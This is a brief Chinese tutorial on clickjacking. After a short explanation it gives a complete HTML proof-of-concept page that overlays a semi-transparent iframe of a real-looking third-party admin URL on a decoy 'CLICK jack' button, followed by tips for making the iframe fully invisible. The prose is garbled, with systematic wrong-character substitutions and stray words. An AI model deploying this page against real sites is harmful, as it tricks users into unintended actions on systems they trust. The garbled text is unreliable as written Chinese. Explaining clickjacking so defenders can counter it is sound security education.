什麼是點擊劫持:html
是一種視覺上的欺騙,攻擊者使用一個透明的,不可見的iframe標籤,覆蓋在一個網頁上,誘使用戶在該網頁上進行操做,用戶在不知情的狀況下點擊透明的iframe頁面經過調整iframe頁面的位置能夠誘使用戶剛好點擊在iframe頁面的的一些功能性按鈕上ui
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>click jack</title>
<style>
iframe{
width:900px;
height: 250px;
top: -195px;
left:-740px;
z-index: 2;
-moz-opacity:0.5;
opacity: 0.5;
filter:alpha(opacity=0.5);
}
button {
position: absolute;
top: 10px;
left: 10px;
width: 120px;
z-index:1;
}
</style>
</head>
<body>
<iframe src="http://search.esgcc.com.cn/managerGf/toGfIndexPage" scrolling="no"></iframe>
<button>CLICK jack</button>
</body>
</html>
經過控制iframe的長寬,調整top,left的位置,能夠把iframe頁面內任意部分覆蓋到任何地方。
同時設置iframe的position位absolute並將z-index的設置爲最大已達到讓iframe在頁面最上層。
最後,經過設置opacity來控制iframe頁面的透明度,值爲0是徹底不可見